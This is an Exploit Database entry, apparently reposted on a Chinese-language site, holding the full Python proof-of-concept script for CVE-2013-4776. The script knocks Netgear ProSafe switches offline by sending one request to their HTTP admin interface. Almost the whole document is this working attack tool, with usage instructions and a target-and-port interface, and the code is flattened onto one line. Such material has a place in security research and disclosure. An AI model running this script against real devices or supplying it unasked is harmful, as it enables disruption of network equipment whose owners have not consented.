Netgear ProSafe – Denial of Service

• Exploit Database
• 112 阅读

• 作者： Juan J. Guelfo
  日期： 2013-08-22
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/27775/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96

  #!/usr/bin/python   ################################################################ ## # Netgear ProSafe - CVE-2013-4776 PoC# # written by Juan J. Guelfo @ Encripto AS# # post@encripto.no # ## # Copyright 2013 Encripto AS. All rights reserved. # ## # This software is licensed under the FreeBSD license. # # http://www.encripto.no/tools/license.php # ## ################################################################   import sys, getopt, urllib2 from subprocess import *     __version__ = "0.1" __author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"     # Prints title and other header info def header(): print "" print " ================================================================= " print "|Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t|".format(__version__) print "|by {0}\t\t|".format(__author__) print " ================================================================= " print ""     # Prints help def help(): header() print """ Usage: python CVE-2013-4776.py [mandatory options]   Mandatory options: -t target ...Target IP address -p port ...Port where the HTTP admin interface is listening on   Example: python CVE-2013-4776.py -t 192.168.0.1 -p 80 """ sys.exit(0)     if __name__ == '__main__':   #Parse options try: options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])   except getopt.GetoptError, err: header() print "\n[-] Error: {0}.\n".format(str(err)) sys.exit(1)   if not options: help()   target = None port = None for opt, arg in options: if opt in ("-t"): target = arg   if opt in ("-p"): port = arg   #Option input validation if not target or not port: help() print "[-] Error: Incorrect syntax.\n" sys.exit(1)   header() headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }   try: # Get the startup config via HTTP admin interface print "[+] Triggering DoS condition..." r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers) urllib2.urlopen(r,"",5).read()   except urllib2.URLError: print "[-] Error: The connection could not be established.\n"   except: print "[+] The switch should be freaking out..." print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"   sys.exit(0)